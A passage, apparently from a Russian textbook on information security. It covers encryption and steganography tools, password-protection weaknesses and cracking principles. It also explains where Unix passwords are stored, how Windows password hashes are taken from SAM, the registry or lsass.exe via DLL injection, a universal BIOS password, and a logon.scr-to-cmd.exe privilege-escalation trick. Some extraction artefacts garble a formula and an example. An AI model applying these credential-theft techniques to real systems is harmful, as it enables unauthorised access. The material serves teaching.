текстом, операционная система не стирает данные физически. Она просто помечает соответствующие блоки на диске как свободные, допуская тем самым повторное использование этого пространства. Если злоумышленник прочитает эти блоки данных вскоре после того, как они были помечены как свободные, он смо-
128 жет восстановить исходный текст. Это может произойти и случайно: если из-за какого-нибудь сбоя будут уничтожены или испорчены другие файлы, для их вос- становления запустят программу восстановления. Эта программа восстановит также и некоторые из ранее стертых файлов. Единственный способ предотвратить восстановление исходно- го открытого текста - это каким-либо образом обеспечить переза- пись места, занимаемого удаленными файлами. Это можно осуще- ствить, используя любую утилиту, которая способна перезаписать все неиспользованные блоки на диске. Такими возможностями, к примеру, обладают многие криптосистемы (Kremlin, BestCrypt и другие). 3) Другая атака может быть предпринята с помощью специально раз- работанного компьютерного вируса или червя, который инфициру- ет криптографическую систему или операционную систему. Такой гипотетический вирус может перехватывать пароль, закрытый ключ или расшифрованное сообщение, а затем тайно сохранять их в фай- ле или передавать по сети своему создателю. Защита от подобных нападений подпадает под категорию об- щих мер защиты от вирусных инфекций. 4) Существует опасность потери секретности данных в связи с тем, что в операционных системах типа Windows используется техноло- гия под названием "виртуальная память". Виртуальная память позволяет запускать на компьютере огромные программы, размер которых больше, чем объем установ- ленных на машине полупроводниковых микросхем памяти. Опера- ционная система сохраняет фрагменты программного обеспечения, которые в настоящий момент не используются, на жестком диске. Это значит, что операционная система может записать некоторые данные, о которых пользователь думает, что они хранятся только в оперативной памяти, на диск без его ведома. Данные на диск записываются в особую временную область, известную как файл подкачки. По мере того как данные становятся нужны, они считываются обратно в оперативную память. Таким об- разом, в каждый отдельный момент в физической памяти находится лишь часть пользовательских программ и данных. Вся эта работа по подкачке остается невидимой для пользователя, который лишь слышит, как щелкает дисковод.
129 Если эта проблема беспокоит пользователей, то можно отклю- чить механизм виртуальной памяти в операционной системе. Одна- ко при этом потребуется больше физически установленных микро- схем оперативной памяти, для того чтобы в нее вошло все необхо- димое для работы прикладной программы. 5) Хорошо оснащенный злоумышленник может предпринять атаку еще одного вида, предполагающую удаленный перехват побочного электромагнитного излучения и наводок (сокращенно - ПЭМИН), испускаемого компьютером. Эта дорогая и часто трудоемкая атака, вероятно, также является более дешевой, чем криптоанализ. Соот- ветствующим образом оборудованный автомобиль может остано- виться рядом с зданием офиса (организации, предприятия) и изда- лека перехватывать нажатия клавиш и сообщения, отображаемые на мониторе. Это скомпрометирует все вводимые пароли, сообщения и т.п. Такая атака может быть предотвращена соответствующим экранированием всего компьютерного оборудования и сетевых ка- белей с тем, чтобы они не испускали излучения. Кроме того можно использовать специальные генераторы "белого шума" для защиты от ПЭМИН. Шифрование информации в изображении и звуке Этот класс продуктов, называемых стеганографическими, позволяет прятать текстовые сообщения в файлы .bmp, .gif, .wav и предназначен для тех случаев, когда пользователь не хочет, чтобы у кого-либо созда- лось впечатление, что он пользуетесь средствами криптографии. При использовании таких программ внешне графический файл остается практически неизменным, меняются лишь кое-где оттенки цве- та. Звуковой файл также не претерпевает заметных изменений. Метод организации связи, который собственно скрывает само нали- чие связи, называется стеганографией. В отличие от криптографии, когда противник может определить, является ли передаваемое сообщение зашифрованным текстом, методы стеганографии позволяют встраивать секретные сообщения в не вызы- вающие подозрения файлы таким образом, чтобы невозможно было за- подозрить существования встроенного сообщения. Слово "стеганография" в переводе с греческого буквально означает "тайнопись" (steganos - секрет, тайна; graphy - запись). К ней относится огромное множество секретных средств связи, таких как невидимые чернила, микрофотоснимки, условное расположение знаков, тайные ка- налы и средства связи на плавающих частотах и т. д.
130 Стеганография занимает свою нишу в обеспечении безопасности: она не заменяет, а дополняет криптографию. Сокрытие сообщения мето- дами стеганографии значительно снижает вероятность обнаружения са- мого факта передачи сообщения. А если это сообщение к тому же за- шифровано, то оно имеет еще один, дополнительный, уровень защиты. В настоящее время в связи с бурным развитием вычислительной техники и новых каналов передачи информации появились новые стега- нографические методы, в основе которых лежат особенности представ- ления информации в компьютерных файлах, вычислительных сетях и т. п. Это дает основание говорить о становлении нового направления - компьютерной стеганографии. Стеганография (также известная как "steg" или "stego") – это «спо- соб написания цифр или букв, которые не понятны никому, кроме чело- века, у которого есть ключ - cryptography». В компьютерный мир стега- нография вошла как метод сокрытия определенного сообщения в другом таким образом, что невозможно увидеть присутствие или смысл скрыто- го сообщения. В технологическом смысле – это способ сокрытия сообщения в тек- стовом, графическом, звуковом или видеофайле. Инструменты стеганографии Стеганографические программы делятся на средства сокрытия со- общений стеганографии и средства обнаружения стеганографии и уни- чтожения первоначального сообщения - стеганализа. Средства стеганографии Существует несколько методов скрытой передачи информации. Одним из них является простой метод скрытия файлов при работе в опе- рационной системе MS-DOS. За текстовым открытым файлом записыва- ется скрытый двоичный файл, объем которого много меньше текстового файла. В конце текстового файла помещается метка EOF (комбинация клавиш Control и Z). При обращении к этому текстовому файлу стан- дартными средствами ОС считывание прекращается по достижении метки EOF, и скрытый файл остается недоступен. Для двоичных файлов никаких меток в конце файла не предусмотрено. Конец такого файла определяется при обработке атрибутов, в которых хранится длина файла в байтах. Доступ к скрытому файлу может быть получен, если файл от- крыть как двоичный. Скрытый файл может быть зашифрован. Если кто- то случайно обнаружит скрытый файл, то зашифрованная информация будет воспринята как сбой в работе системы. Недостатком такого про-
131 стого способа является демаскирующее увеличение размера файла и вы- сокая вероятность обнаружения вложенной информации. Гораздо лучших результатов можно добиться, внедряя информацию в мультимедийные файлы. Графическая и звуковая информация представляются в числовом виде. Так в графических объектах наименьший элемент изображения может кодироваться одним байтом. В младшие разряды определенных байтов изображения в соответствии с алгоритмом криптографического преобразования помещаются биты скрытого файла. Если правильно по- добрать алгоритм преобразования и изображение, на фоне которого по- мещается скрытый файл, то человеческому глазу практически невоз- можно отличить полученное изображение от исходного. Очень сложно выявить скрытую информацию и с помощью специальных программ. Наилучшим образом для внедрения скрытой информации подходят изображения местности: фотоснимки со спутников, самолетов и т. п. С помощью средств стеганографии могут маскироваться текст, изображе- ние, речь, цифровая подпись, зашифрованное сообщение. Комплексное использование стеганографии и шифрования многократно повышает сложность решения задачи обнаружения и раскрытия конфиденциаль- ной информации. Рассмотрим средства сокрытия сообщения в графических файлах. Одной из наиболее интересных программ этого класса является InThePicture. Внешний вид программы приведен на рис. 25.
Рис. 25. Стеганографическая программа InThePicture
132 InThePicture (http://www.intar.com/ITP) - программа, позволяющая защитить от просмотра текстовые сообщения, внедряя их в графическое изображение, фактически в BMP-файл. В процессе такого внедрения ис- пользуется уникальный ключ, который можно считать ключом шифро- вания. Графический файл, служащий носителем передаваемой информа- ции, отсылается получателю. Последний, зная ключ, может извлечь из него нужную информацию. Программа поддерживает механизм «drag and drop» и снабжена довольно удобным (хотя и несколько необычным) интерфейсом. Результаты стеганографического сокрытия информации в графиче- ских файлах представлены на рис. 26.
а) исходное изображение б) с внедренным сообщением
Рис. 26. Исходное изображение а) и практически неотличимое от ис- ходного изображение с внедренным сообщением методом б) Другими программами сокрытия сообщений в мультимедийных файлах являются F5, SecurEngine, MP3Stego, Steganos Suite и др. F5 была разработана Андреасом Вестфилдом (Andreas Westfield) и работает под управлением MS DOS. Она позволяет внедрять сообщение в файл формата JPEG. Пользователь очень легко может это сделать, сле- дуя инструкциям мастера, указывая путь к картинке. F5 работает только с текстовыми файлами. SecurEngine позволяет пользователям спрятать сообщение в изоб- ражении и (или) зашифровать его. MP3Stego позволяет прятать данные в файлах формата MP3. Про- цесс преобразования заключается в следующем: текстовый файл коди- руется как звуковой в формате WAV, который затем преобразовывается в формат MP3. Steganos Suite – это коммерческий пакет, объединивший множество утилит. В дополнение к функции трассировки и утилиты для уничтоже- ния файлов программа также обладает файловым менеджером, что поз- воляет пользователям шифровать и скрывать файлы на своем винчесте-
133 ре. Пользователь выделяет файл, который следует скрыть, и несущий (обязательно графический или музыкальный) файл. Программа также позволяет самим пользователям создавать файлы при помощи микрофо- на или сканера. Если у вас нет подходящего файла, встроенный файло- вый менеджер умеет искать нужный файл на жестком диске. Таким образом, вышеописанными средствами можно замаскировать передачу важного сообщения (например, содержащего боевое распоря- жение) под пересылку «картинки» или «музыки» своему знакомому. Та- кой прием маскировки под частную почту особенно ценен в тех частых случаях, когда для передачи сообщения используются арендованные ка- налы связи, в которых потенциально возможно ведение разведки про- тивником или перехват организацией-владельцем канала. Средства стеганализа Методы стеганографии могут использоваться с целью незаконных, несанкционированных или нежелательных действий со стороны леги- тимных пользователей. С другой стороны, средства стеганографии мо- гут быть использованы противником (например, террористической ор- ганизацией) для передачи сообщений в сетях общего пользования. Определение даже самого факта использования стеганографии является весьма сложной задачей и практически единственным способом актив- ного наблюдения за специальными файлами. Системы обнаружения вторжения могут помочь в определении нормального трафика и, таким образом, увидеть аномалии, например, при передаче больших картинок по сети. Если администратор подготов- лен к такому виду аномальной активности, то это может помочь в даль- нейшем расследовании. Находящиеся на каждой машине системы обна- ружения вторжения также могут помочь в обнаружении аномального скопления изображений и видеофайлов. Известен такой способ обнаружения стеганографических сообще- ний, как статистический анализ, суть которого заключается в сравне- нии частоты распределения цветов для возможного носителя скрытой информации и ожидаемая частота распределения цветов для файла- носителя скрытой информации. Для JPEG-файлов существует утилита Stegdetect, которая способна определять следы стеганографии в этих файлах. Программа Stegbreak способна расшифровывать и находить возможную информацию в подо- зрительном файле. Шифрование с помощью архиваторов
134 Arj, Rar, WinZip и им подобные архиваторы позволяют создавать защищенные паролем архивы. Этот способ защиты значительно слабее описанных выше. Специалисты по криптографии утверждают, что в ме- тодах шифрования, применяемых в архиваторах, содержаться "дыры", позволяющие взломать архив не только подобрав пароль, но и другими способами. Поэтому не следует пользоваться методом архивации файлов с целью шифрования данных. Защита жестких дисков, файлов и каталогов с помощью специ- альных программ Проблема защиты данных на жестких дисках ПК, является, пожа- луй, самой актуальной в области защиты информации. Одной из программ шифрования логических дисков является про- грамма BestCrypt. Есть версии для Dos, Win 3.XX, Windows 95/98, Windows NT. На таких дисках целесообразно хранить не только всю секретную информацию, но и другие программы шифрования с секрет- ными ключами. Программа на выбор предлагает три алгоритма шифрования (DES, GOST, BlowFish) - рекомендуется выбирать проверенные алгоритмы – GOST или BlowFish. Кроме создания шифрованных дисков (и всего сервиса связанного с ними) программа позволяет полностью на физическом уровне произво- дить шифрование дискет, что очень удобно для передачи секретной ин- формации. Подобных программ существует много, и все они отличаются по своим возможностям. Поэтому необходимо подбирать их с учетом вер- сии операционной системы и перечня необходимых функций, которые должны быть реализованы в такой программе. Так, например, программа Kremlin является как бы логическим до- полнением программы BestCrypt. Она позволяет шифровать файлы и электронную почту по многим алгоритмам, на выбор (IDEA, 3DES, CAST и др.). Но главным ее достоинством является возможность (в за- данные промежутки времени, или, например, при каждом выключении компьютера) НЕВОССТАНОВИМО стирать все файлы истории, лог- файлы, временные файлы Интернет а также все те файлы что пользова- тель укажет. Кроме того, можно указать НЕВОССТАНОВИМОЕ обну- ление информации на свободном месте жесткого диска и в файле вирту- альной памяти (своп-файле) Windows.
135 В таблице 7 приведен обзор некоторых программ шифрования с указанием алгоритма шифрования и адреса в Интернете.
Таблица 7 Обзор некоторых программ шифрования
Название Алгоритм шифрования Адрес в Интернете программы Bcrypt аналог алгоритма DES BLOWFISH, DES и ГОСТ BestCrypt www.jetico.sci.fi 28147-89 ftp.funet.fi/pub/crypt/utilit Cryptext RC4, SHA-1 ies/file/ Authentex- BLOWFISH www.somarsoft.com DataSAFE Encrypt-lt for DES и BLOWFISH Win95/NT Interscope www.interscope.ro/Black DES BlackBox Box Kremlin DES, IDEA, BLOWFISH, RC4 www.mach5.com/kremlin
3.3. Парольные средства защиты
Этот класс средств защиты, на сегодняшний день, является самым распространённым. Основной принцип работы данных систем заключа- ется в идентификации и аутентификации пользователя ПО путём запро- са дополнительных данных, это могут быть название фирмы и/или имя и фамилия пользователя и его пароль либо только пароль / регистрацион- ный код. Эта информация может запрашиваться в различных ситуациях, например, при старте программы, по истечении срока бесплатного ис- пользования ПО, при вызове процедуры регистрации либо в процессе установки на ПК пользователя. Процедуры парольной защиты просты в реализации и, поэтому, очень часто применяются производителями ПО. Большинство парольных средств защиты использует логические меха- низмы, сводящиеся к проверке правильности пароля / кода и запуске или не запуске ПО, в зависимости от результатов проверки. Существуют так же системы, шифрующие защищаемое ПО и использующие пароль или производную от него величину как ключ дешифрации, большинство та- ких систем использует слабые или простейшие алгоритмы шифрования,
136 нестойкие к направленным атакам. Это происходит из-за сложности корректной реализации стойких криптоалгоритмов и нецелесообразно- сти их применения для защиты недорогих условно-бесплатных про- граммных продуктов, составляющих большинство ПО, использующего парольные защиты. Лишь в последнее время разработаны парольные СЗПО, реализующие стойкие криптоалгоритмы типа DES и RSA, они реализованы в виде защитного модуля и вспомогательных библиотек и устанавливаются на уже скомпилированные модули ПО. Слабым звеном парольных защит является блок проверки правиль- ности введённого пароля / кода. Для такой проверки можно сравнивать введённый пароль с записанным в коде ПО правильным либо с правиль- но сгенерированным из введённых дополнительных данных паролем. Возможно так же сравнение производных величин от введённого и пра- вильного паролей, например их ХЭШ-функций, в таком случае в коде можно сохранять только производную величину, что повышает стой- кость защиты. Путём анализа процедур проверки можно найти реальный пароль, записанный в коде ПО, найти правильно сгенерированный па- роль из введённых данных либо создать программу для перебора паро- лей для определения пароля с нужной ХЭШ-суммой. Кроме того, если средств защиты не использует шифрования, достаточно лишь принуди- тельно изменить логику проверки для получения беспрепятственного доступа к ПО. Шифрующие системы более стойки к атакам, но при использовании простейших или некорректно реализованных криптоалгоритмов есть опасность дешифрации ПО. Для всех парольных систем существует угроза перехвата пароля при его вводе авторизованным пользователем. Кроме того, в большин- стве средств защиты данного типа процедура проверки используется лишь единожды, обычно при регистрации или установке ПО, затем си- стема защиты просто отключается, что создаёт реальную угрозу для НСД при незаконном копировании ПО. Положительные стороны: Надёжная защита от злоумышленника-непрофессионала. Минимальные неудобства для пользователя. Возможность передачи пароля / кода по сети. Отсутствие конфликтов с системным и прикладным ПО и аппарат- ным обеспечением. Простота реализации и применения. Низкая стоимость.
137 Отрицательные стороны: Низкая стойкость большинства систем защиты данного типа. Пользователю необходимо запоминать пароль / код.
3.3.1. Ограничение доступа к ресурсам информационной
системы В простейшем случае можно воспользоваться аппаратными сред- ствами установления пароля на запуск операционной системы ПК с по- мощью установок в CMOS Setup. При запуске ПК на экране монитора появляется сообщение (в зависимости от типа установленного BIOS) ви- да: 1) Press "DEL" if you want to run Setup или 2) Press "Ctrl""Alt""Esc" if you want to run Setup (для некоторых видов BIOS) или 3) F2 – Setup. При нажатии клавиши "DEL" или ("Ctrl"+"Alt"-"Esc") или F2 на экране появится меню CMOS Setup. Нужно выбрать опцию Password Checking Option, ввести пароль, сохранить новые установки Setup ("F10", "Y") и перезапустить ПК. Теперь перед каждым запуском ком- пьютера на экране монитора будет появляться сообщение с требованием ввести пароль. К сожалению, использование подобной парольной идентификации не является надежным. Достаточно ввести универсальный пароль (например, AWARD_SW) или отключить аккумуляторную батарею, расположенную на материнской плате, и компьютер "забудет" все уста- новки CMOS Setup. Защита встроенного накопителя на жестком магнитном диске со- ставляет одну из главных задач защиты ПК от постороннего вторжения. Существует несколько типов программных средств, способных решить задачи защиты: средства защиты от любого доступа к жесткому диску; средства защиты диска от записи/чтения; средства контроля за обращением к диску; средства удаления остатков секретной информации. Защита встроенного жесткого диска обычно осуществляется путем применения специальных паролей для идентификации пользователя (так называемая парольная идентификация). В данном случае доступ к жест- кому диску можно получить при правильном введении пароля при за-
138 грузке операционной системы. В противном случае загрузка системы не произойдет, а при попытке загрузки с гибкого диска, жесткий диск ста- новится "невидимым" для пользователя. Эффект защиты жесткого диска в системе достигается видоизменением загрузочного сектора диска, из которого удаляется информация о структуре диска. Такая защита весьма эффективна, и она надежно защищает жесткий диск от рядового пользо- вателя. Одним из вариантов защиты жестких магнитных дисков от НСД яв- ляется использование таких операционных систем как Windows NT. По сравнению с Windows 95 и Windows 98 операционная система Windows NT имеет достаточно эффективные средства по защите информации в ПК. Во-первых, при запуске Windows NT требует ввода пароля, и если он будет введен неправильно, система не запустится. Во-вторых, эта ОС имеет встроенную систему администрирования. Администратором является владелец компьютера. Если на компьютере работают в разное время несколько пользователей, то администратор имеет возможность назначить права каждому пользователю по доступу к магнитным дискам, каталогам, файлам вплоть до полного запрета поль- зоваться информацией на каком-либо диске. Такие же права админи- стратор может назначить и для пользователей, которые обращаются к компьютеру из вычислительной сети. Кроме того, администратор может просмотреть журнал событий и выявить, что происходило на компьютере при работе других пользова- телей. В-третьих, имеет возможность форматировать магнитные диски в формате NTFS. В таком случае если к компьютеру будут обращаться пользователи, работающие в среде операционных систем, которые под- держивают формат дисков FAT, то они вообще не увидят дисков с NTFS. Однако необходимо помнить о том, что применение Windows NT не является абсолютно надежным средством защиты информации, так как известны программные средства, разработанные хакерами, которые об- ходят парольную защиту системы и позволяют читать диски NTFS из- под ОС, поддерживающих формат дисков FAT.
3.3.2. Принципы работы парольных взломщиков
Криптографические алгоритмы, применяемые для шифрования па-
ролей пользователей в современных ОС, являются слишком стойкими,
139 чтобы можно было надеяться отыскать методы их дешифрования, кото- рые окажутся более эффективными, чем тривиальный перебор возмож- ных вариантов. Поэтому парольные взломщики иногда просто шифруют все пароли с использованием того же самого криптографического алго- ритма, который применяется для их засекречивания в атакуемой ОС, и сравнивают результаты шифрования с тем, что записано в системном файле, где находятся шифрованные пароли пользователей этой системы. При этом в качестве вариантов паролей парольные взломщики исполь- зуют символьные последовательности, автоматически генерируемые из некоторого набора символов. Данный способ позволяет взломать все па- роли, если известно их представление в зашифрованном виде и они со- держат только символы из данного набора. Максимальное время, кото- рое потребуется для взлома пароля Т, можно вычислить в соответствии со следующей формулой: N LP T (5) S
где N - число символов в наборе, L - предельная длина пароля, Р-
вероятность того, что пароль может быть подобран за время жизни, S - количество проверок в секунду (зависит от операционной системы и быстродействия компьютера, на котором производится взлом ее пароль- ной защиты). Из приведенной формулы видно, что за счет очень большого числа перебираемых комбинаций, которое растет экспоненциально с увеличе- нием числа символов в исходном наборе, такие атаки парольной защиты ОС могут отнимать слишком много времени. Однако хорошо известно, что большинство пользователей операционных систем особо не затруд- няют себя выбором стойких паролей, то есть таких, которые трудно взломать. Поэтому для более эффективного подбора паролей взломщики обычно используют специальные словари, которые представляют собой заранее сформированный список слов, наиболее часто используемых на практике в качестве паролей.
3.3.3. Практика применения паролей
Фундаментальным требованием к управлению доступом в компью-
теризированной системе является способность аутентифицировать поль- зователей.
140 Хотя ведется поиск более эффективных методов аутентификации, аутентификация по паролям остается доминирующей. Известно, что паролям свойственны определенные недостатки. Компромисс между запоминаемостью пароля и требованиями безопас- ности создает некоторые трудности для генерирования паролей. Пароли должны выбираться из большего объема возможных вариантов и быть трудно угадываниями. Однако, если пароли выбираются по принципу трудного угадыва- ния, то их также трудно запоминать. Поэтому организация должна вы- работать такую политику применения паролей, которая уравновешивала бы легкое запоминание и подверженность раскрытию. Несмотря на широкое применение паролей, очень мало внимания обращалось на характеристики их практического использования. Лите- ратура, посвященная безопасности применения паролей, редко основы- вается на практическом опыте. Большинство статей по этому вопросом содержит попытки дать рекомендации пользователям, как им следует использовать пароли, основанные на некоторых априорных предложе- ниях. Отсюда очевидна потребность в эмпирической базе для этих пред- ложений. Результаты ряда исследования показали, что, несмотря на большие старания профессионалов информационных систем привить правильное отношение к выбору и применению паролей, пользователи продолжают выбирать короткие, легко запоминающиеся пароли, составленные из букв алфавита. Хотя периодическая смена паролей - основная мера безопасно- сти,79,5% ответственных пользователей никогда не меняют свои пароли. Менее 5,6% из них меняют свои пароли чаще, чем раз в год. Результаты исследований показали, что в последнее время измени- лось отношение пользователей к безопасности компьютеризированных информационных систем. Общая тенденция к усилению информацион- ной безопасности привела к лучшему пониманию отдельными пользова- телями требований безопасности и более терпимому их отношению к организационным, административным и техническим процедурам под- держки безопасности. Рекомендации по повышению безопасности информационной си- стемы при применении паролей сводятся к следующему: пароль должен быть достаточно длинным; пароль должен формироваться из смысловых элементов, способ- ствующих его запоминанию;
141 пароль должен содержать смесь знаков, включая специальные зна- ки кода ASCII; необходима частая смена паролей; пароль не должен записываться на бумагу. Хотя пароли находят широкое применение, доверие к ним как к средству обеспечения адекватной безопасности информационной систе- мы понижается.
3.4. Механизмы функционирования парольных кэшей
операционных систем Под парольным кэшем понимается механизм сохранения и повтор- ного использования паролей в системе. От обычной базы логинов дан- ный механизм отличается именно хранением дополнительных пароль- ных ресурсов и возможностью их использования по специальному за- просу без участия пользователя [25].
3.4.1. Пароли в Linux
В Linux пароли шифруются в алгоритме "DES", также есть такая
фишка как "salt", это 2е любые буквы, которые являются ключом к па- ролю, другими словами, с помощью "salt" и шифруется пароль. Подроб- нее об этом написано в статье "пароли в UNIXе" (почитать можно на http://www.hack-crack.com)./ Просто не хочу повторяться, да и тема у нас сейчас другая. Пароли в большинстве случаев хранятся в следующих файлах:
/etc/passwd /etc/shadow
Хотя могут и лежать в каком-нибудь /etc/shadow.old или
/etc/passwd.tmp . Сделав листинг директории /etc/, сразу можно все по- нять. Просто иногда грамотные администраторы меняют названия фай- лов. passwd файл, это как раз то что нам надо, но в большинстве случаев пароли хранятся в shadow (в тени). Например, вот если видим такую си- туацию:
2. 653MWdpUGN3BM - пароль зашифрованный в DES. 3. 66:1 - номер пользователя в системе : номер рабочей группы (у root всегда 0:0). 4. John Nikolsen, 2-nd west - информация о пользователе (обычно Имя, Фамилия…). 5. /home/john - Домашний каталог. 6. /bin/csh - shell.
Теперь можно свободно разобрать passwd файл. Но сразу хотелось
бы отметить, что на файл в котором находятся пароли в DES (будь то shadow или passwd), права в большинстве случаев дают r-------- или r—r- ----, это значит, что права на чтения есть у root'а и зарегистрированных пользователей (во втором случае r—r-----). Так что, через какой-нибудь htmlscript, вряд ли удастся просмотреть, но все таки иногда везет, и по- лучается просмотреть все содержимое. В Free BSD пароли хранятся в файле /etc/master.passwd , а в остальном технология такая же как и в LINUX, хотя используется более стойкий алгоритм шифрования MD5. В Open BSD, для шифрования ис- пользуется алгоритм Blowfish.
3.4.2. Теория и практика аудита и восстановления паролей
Windows NT/2000/XP/Vista/Seven/Vista/Seven Операционные системы Windows NT/2000/XP/Vista/Seven хранят пароли в зашифрованном виде, называемом хэшами паролей (hash (англ.) - смесь, мешанина). Пароли не могут быть получены непосред- ственно из хэшей. Восстановление паролей заключается в вычислении хэшей по возможным паролям и сравнении их с имеющимися хэшами паролей. Аудит паролей включает в себя проверку возможных путей по- лучения информации об учетных записях пользователей, результатом восстановления паролей является их представление в явном виде с уче- том регистра.
143 Получение хэшей паролей Существует несколько путей получения хэшей паролей, зависящих от их местонахождения и имеющегося доступа. Хэши паролей могут быть получены следующими способами: из файла SAM или его резервной копии; непосредственно из реестра операционной системы локального или удаленного компьютера; из реестра или Active Directory локального компьютера или уда- ленного компьютера внедрением DLL; посредством перехвата аутентификационных пакетов в сети.
Получение хэшей паролей из файла SAM
Учетные записи пользователей, содержащие в том числе имя поль- зователя и его пароль, хранятся в реестре Windows NT/2000/XP/Vista/Seven/Vista/Seven, а именно в той его части, которая находится в файле SAM (Security Account Manager) - диспетчер защиты учетных записей). Этот файл можно найти на диске в каталоге %SystemRoot%\system32\config, на диске аварийного восстановления си- стемы или на резервной магнитной ленте. К файлу SAM в каталоге %SystemRoot%\system32\config нельзя по- лучить доступ, пока Windows загружена, так как он открыт операцион- ной системой. Если имеется физический доступ к машине, необходимо скопировать файл, загрузив на этой машине другую копию операцион- ной системы или другую операционную систему. Если Windows NT /2000/XP/Vista/Seven установлена на диске с файловой системой NTFS, то для MS-DOS и Windows 95/98/Me дополнительно нужны программы, обеспечивающие доступ к диску с NTFS из этих операционных систем. В MS-DOS могут быть использованы NTFSDOS и NTFSDOS Profession- al, в Windows 95/98/Me - NTFS for Windows 98.. Для доступа из операци- онной системы Linux требуется включение поддержки NTFS. Также можно загрузиться с дискеты и скопировать файл SAM, предварительно запустив обеспечивающую доступ к разделам с NTFS программу. После этого нужно выполнить импорт файла SAM. Извлечение хэшей паролей из файла SAM было разработано и впервые реализовано в программе SAMDump. При импорте файла SAM осуществляется получение списка учетных записей пользователей, содержащихся в файле SAM. Процесс импорта файла SAM подобен получению хэшей паролей методом pwdump за исключением того, что вместо функций Windows API, обес- печивающих работу с реестром Windows, используется их эмуляция.
144 При выполнении импорта файла SAM из программы SAMDump все не- латинские буквы, имеющиеся в именах пользователей, будут искажены. Программа LC+ лишена этого недостатка. Другой способ получить файл SAM в операционной системе Windows NT, причем не требующий перезагрузки машины, - это копи- рование его из каталога %SystemRoot%\repair или с диска аварийного восстановления. Каждый раз, когда в Windows NT создается диск ава- рийного восстановления с помощью программы RDISK, файл SAM за- паковывается и сохраняется в файл sam._, являющийся резервной копи- ей файла SAM. Файл sam._ представляет из себя архив в формате cabinet. Этот файл может быть распакован командой "expand sam._ sam". Недостатком этого способа является то, что с момента создания диска аварийного восстановления пароли могли измениться и, возможно, файл sam._ содержит устаревшие данные. В программе LC+ имеется встроен- ная возможность импорта файла SAM и из файла sam._, избавляющая от необходимости использования программы expand. При импорте списка учетных записей пользователей из файла sam._ он предварительно рас- паковывается, затем выполняется непосредственно импорт файла SAM. Файл SAM также копируется, когда создается полная резервная ко- пия. Если имеется доступ к резервной копии, можно восстановить файл SAM из %SystemRoot%\system32\config на другую машину и затем из- влечь из него хэши паролей. Недостатком и этого способа также являет- ся то, что с момента последнего сеанса создания резервной копии паро- ли могли измениться. Существует служебная программа SYSKEY, впервые появившаяся в составе Service Pack 3 для Windows NT. Программа SYSKEY дополни- тельно зашифровывает хэши паролей учетных записей, что делает им- порт файла SAM вышеупомянутым способом бесполезным. SYSKEY может использоваться в одном из трех вариантов: сгенерированный ключ шифрования записывается на локальный жесткий диск в зашифрованном виде; сгенерированный ключ шифрования записывается на дискету, ко- торая должна быть вставлена во время загрузки операционной си- стемы; для получения ключа шифрования берется пароль, выбранный ад- министратором и вводимый во время загрузки операционной си- стемы. Служебная программа SYSKEY в операционной системе Windows NT для дополнительной защиты паролей учетных записей после уста-
145 новки Service Pack соответствующей версии должна быть активизирова- на вручную. В операционных системах Windows 2000/XP/Vista/Seven программа SYSKEY изначально присутствует и активизирована. Получение хэшей паролей из реестра операционной системы При получении хэшей паролей из реестра операционной системы осуществляется непосредственный доступ к реестру. Для выполнения импорта информации необходимо иметь административные права на компьютере, дамп паролей учетных записей которого требуется создать. Если компьютер не является локальным, то должен быть разрешен уда- ленный доступ к реестру и иметься соответствующие права. Получение хэшей данным способом впервые стало возможным в программе pwdump. При выполнении импорта информации этим способом с помо- щью программы pwdump имена пользователей, содержащие нелатин- ские буквы, будут искажены. Для получения хэшей паролей из реестра рекомендуется воспользоваться LC+. Если программа SYSKEY активизирована, хэши паролей дополни- тельно зашифровываются. Выполнение импорта при этом становится бесполезным так же, как и импорт файла SAM, т.к. пароли по дополни- тельно зашифрованным хэшам восстановлены не будут. Получение хэшей паролей внедрением DLL Данный метод был разработан и реализован в программе pwdump2. Получение хэшей паролей методом pwdump2 возможно вне зависимости от того, была активизирована программа SYSKEY, или нет. Для созда- ния дампа паролей методом pwdump2 необходимо иметь право SeDebugPrivilege. По умолчанию только пользователи группы админи- страторов имеют его, поэтому нужно иметь административные права для использования этого метода. Использование метода pwdump2 воз- можно только на локальной машине. Метод pwdump2 использует для создания дампа паролей способ, называемый внедрением DLL. Один процесс вынуждает другой процесс (lsass.exe), используя его идентификатор процесса, загружать DLL (samdump.dll) и выполнять некоторый код из DLL в адресном простран- стве другого процесса (lsass.exe). Загрузив samdump.dll в lsass (систем- ная служба LSASS - Local Security Authority Subsystem), программа ис- пользует тот же самый внутренний API, что msv1_0.dll, чтобы обратить- ся к хэшам паролей. Это означает, что она может получить хэши без вы- полнения таких действий, как перемещение их из реестра и дешифрова-
146 ние. Программа не заботится ни о том, каковы алгоритмы шифрования, ни каковы ключи. В версии программы pwdump2, поддерживающей Active Directory, имеется ошибка, не позволяющая получить хэши паролей, если в опера- ционной системе есть учетные записи с нелатинскими буквами в име- нах. Получение хэшей паролей данным методом рекомендуется выпол- нять в программе LC+. Метод, использующийся в программе pwdump2, был доработан для получения хэшей паролей не только с локальной, но и с удаленной ма- шины в программах pwdump3/pwdump3e. На удаленный компьютер ко- пируются исполняемый файл службы и файл DLL. После копирования файлов на удаленном компьютере создается и запускается новая служба, выполняющая те же действия, что и программа pwdump2 на локальном компьютере. Далее выполняется удаление службы и файлов, ранее ско- пированных. Передача информации об учетных записях пользователей производится через раздел реестра на удаленном компьютере, временно создаваемый и уничтожаемый после завершения копирования данных. В программе pwdump3e выполняется дополнительное шифрование пере- даваемых данных по алгоритму Diffie-Hellman для сохранения конфи- денциальности при их возможном перехвате при передаче по сети. Ис- пользование данного метода также требует административных прав на той машине, информацию об учетных записях пользователей с которой хочется получить. При выполнении импорта информации этим способом с помощью программ pwdump3/pwdump3e имена пользователей, содержащие нела- тинские буквы, будут искажены. Для получения хэшей паролей с уда- ленного компьютера внедрением DLL рекомендуется воспользоваться LC+. Если административные права на локальном компьютере отсут- ствуют, можно воспользоваться уязвимостью операционных систем Windows NT/2000/XP/Vista/Seven, заключающейся в замене экранной заставки, запускаемой при отсутствии регистрации пользователя опера- ционной системы в течение некоторого времени (по умолчанию интер- вал времени составляет 15 минут для Windows NT/2000, 10 минут - для Windows XP). Для этого файл %SystemRoot%\system32\logon.scr заменя- ется на требуемый исполняемый файл (например, cmd.exe), который бу- дет запущен операционной системой вместо экранной заставки с права- ми системы. Замена может быть выполнена способом, используемым при копировании файла SAM. Доступ к диску с NTFS с возможностью
